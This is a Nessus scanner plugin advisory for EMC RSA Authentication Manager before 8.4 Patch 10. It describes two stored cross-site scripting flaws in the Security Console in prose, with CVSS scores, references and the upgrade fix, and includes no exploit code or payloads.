EMC RSA Authentication Manager < 8.4 P10 Multiple Vulnerabilites (DSA-2020-052)

Low Nessus Plugin ID 135179

Synopsis

An application running on the remote host is affected by an insecure credential management vulnerability.

Description

The version of EMC RSA Authentication Manager running on the remote host is prior to 8.4 Patch 10. It is, therefore, affected by multiple vulnerabilities:

- A cross-site scripting (XSS) vulnerability exists in Security Console due to improper validation of user-supplied input before returning it to users. An authenticated, remote attacker can exploit this to store code in a Security Console report that will then be run by other Security Console administrators accessing a report page. (CVE-2020-5339)

- A cross-site scripting (XSS) vulnerability exists in Security Console due to improper validation of user-supplied input before returning it to users. An authenticated, remote attacker can exploit this to store code in a Security Console default security domain mapping that will then be run by other Security Console administrators attempting to change the default security domain mapping. (CVE-2020-5340)

Solution

Upgrade to EMC RSA Authentication Manager version 8.4 Patch 10 or later.

See Also

https://nvd.nist.gov/vuln/detail/CVE-2020-5339

http://www.nessus.org/u?e1e30067

Plugin Details

Severity: Low

ID: 135179

File Name: emc_rsa_am_8_4_p10.nasl

Version: 1.3

Type: remote

Family: CGI abuses

Published: 2020/04/02

Updated: 2020/04/24

Dependencies: 73348

Risk Information

Risk Factor: Low

CVSS Score Source: CVE-2020-5339

CVSS v2.0

Base Score: 3.5

Temporal Score: 2.6

Vector: CVSS2#AV:N/AC:M/Au:S/C:N/I:P/A:N

Temporal Vector: CVSS2#E:U/RL:OF/RC:C

CVSS v3.0

Base Score: 4.8

Temporal Score: 4.2

Vector: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N

Temporal Vector: CVSS:3.0/E:U/RL:O/RC:C

Vulnerability Information

CPE: cpe:/a:emc:rsa_authentication_manager, cpe:/a:rsa:authentication_manager

Required KB Items: installed_sw/EMC RSA Authentication Manager

Exploit Ease: No known exploits are available

Patch Publication Date: 2019/02/26

Vulnerability Publication Date: 2019/02/26

Reference Information

CVE: CVE-2020-5339

BID: 107210

IAVB: 2020-B-0017-S